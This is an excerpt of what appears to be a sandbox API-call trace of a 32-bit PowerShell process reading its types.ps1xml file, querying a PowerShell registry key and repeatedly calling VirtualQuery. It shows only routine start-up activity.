	[0151.209] GetSystemInfo (in: lpSystemInfo=0x10de18 | out: lpSystemInfo=0x10de18*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0151.210] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0151.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.793] GetLastError () returned 0x0
	[0151.793] SetErrorMode (uMode=0x1) returned 0x1
	[0151.793] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0151.793] GetLastError () returned 0x0
	[0151.793] GetFileType (hFile=0x2fc) returned 0x1
	[0151.793] SetErrorMode (uMode=0x1) returned 0x1
	[0151.794] GetFileType (hFile=0x2fc) returned 0x1
	[0151.794] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.797] GetLastError () returned 0x0
	[0151.798] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.798] GetLastError () returned 0x0
	[0151.799] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.799] GetLastError () returned 0x0
	[0151.799] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.800] GetLastError () returned 0x0
	[0151.800] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.800] GetLastError () returned 0x0
	[0151.801] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.801] GetLastError () returned 0x0
	[0151.801] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.801] GetLastError () returned 0x0
	[0151.801] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.801] GetLastError () returned 0x0
	[0151.801] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.801] GetLastError () returned 0x0
	[0151.802] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.803] GetLastError () returned 0x0
	[0151.803] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.803] GetLastError () returned 0x0
	[0151.803] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.803] GetLastError () returned 0x0
	[0151.803] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.803] GetLastError () returned 0x0
	[0151.803] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.803] GetLastError () returned 0x0
	[0151.804] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.804] GetLastError () returned 0x0
	[0151.804] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.804] GetLastError () returned 0x0
	[0151.804] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.804] GetLastError () returned 0x0
	[0151.807] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.807] GetLastError () returned 0x0
	[0151.808] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.808] GetLastError () returned 0x0
	[0151.808] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.808] GetLastError () returned 0x0
	[0151.808] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.808] GetLastError () returned 0x0
	[0151.808] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.809] GetLastError () returned 0x0
	[0151.809] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.809] GetLastError () returned 0x0
	[0151.809] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.809] GetLastError () returned 0x0
	[0151.809] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.809] GetLastError () returned 0x0
	[0151.810] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.810] GetLastError () returned 0x0
	[0151.810] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.810] GetLastError () returned 0x0
	[0151.810] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.810] GetLastError () returned 0x0
	[0151.811] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.811] GetLastError () returned 0x0
	[0151.811] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.811] GetLastError () returned 0x0
	[0151.811] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.811] GetLastError () returned 0x0
	[0151.812] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.812] GetLastError () returned 0x0
	[0151.812] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.812] GetLastError () returned 0x0
	[0151.818] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.818] GetLastError () returned 0x0
	[0151.818] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.818] GetLastError () returned 0x0
	[0151.818] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.819] GetLastError () returned 0x0
	[0151.819] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.819] GetLastError () returned 0x0
	[0151.819] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.819] GetLastError () returned 0x0
	[0151.819] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.820] GetLastError () returned 0x0
	[0151.820] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.820] GetLastError () returned 0x0
	[0151.820] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0151.820] GetLastError () returned 0x0
	[0151.820] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x1b4, lpOverlapped=0x0) returned 1
	[0151.821] GetLastError () returned 0x0
	[0151.821] ReadFile (in: hFile=0x2fc, lpBuffer=0x2a00c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x2a00c24*, lpNumberOfBytesRead=0x10e714*=0x0, lpOverlapped=0x0) returned 1
	[0151.821] GetLastError () returned 0x0
	[0151.821] CloseHandle (hObject=0x2fc) returned 1
	[0151.821] GetLastError () returned 0x0
	[0151.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.821] GetLastError () returned 0x0
	[0151.821] SetErrorMode (uMode=0x1) returned 0x1
	[0151.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2a214b4 | out: lpFileInformation=0x2a214b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0151.822] GetLastError () returned 0x0
	[0151.822] SetErrorMode (uMode=0x1) returned 0x1
	[0151.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.822] GetLastError () returned 0x0
	[0151.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e698 | out: phkResult=0x10e698*=0x2fc) returned 0x0
	[0151.822] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e6e0, lpData=0x0, lpcbData=0x10e6dc*=0x0 | out: lpType=0x10e6e0*=0x1, lpData=0x0, lpcbData=0x10e6dc*=0x56) returned 0x0
	[0151.822] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e6e0, lpData=0x584bc0, lpcbData=0x10e6dc*=0x56 | out: lpType=0x10e6e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e6dc*=0x56) returned 0x0
	[0151.823] RegCloseKey (hKey=0x2fc) returned 0x0
	[0151.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.823] GetLastError () returned 0x0
	[0151.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0151.823] GetLastError () returned 0x0
	[0156.255] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.353] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.355] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.355] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.356] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.356] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.357] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.362] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.383] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.383] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.383] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.384] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.384] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.384] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.385] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.385] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.542] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.549] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.549] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.550] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.551] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.552] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.552] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.553] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.553] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.554] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.554] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.554] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.554] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.555] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.557] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.561] VirtualQuery (in: lpAddress=0x10d5d8, lpBuffer=0x10e5d8, dwLength=0x1c | out: lpBuffer=0x10e5d8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
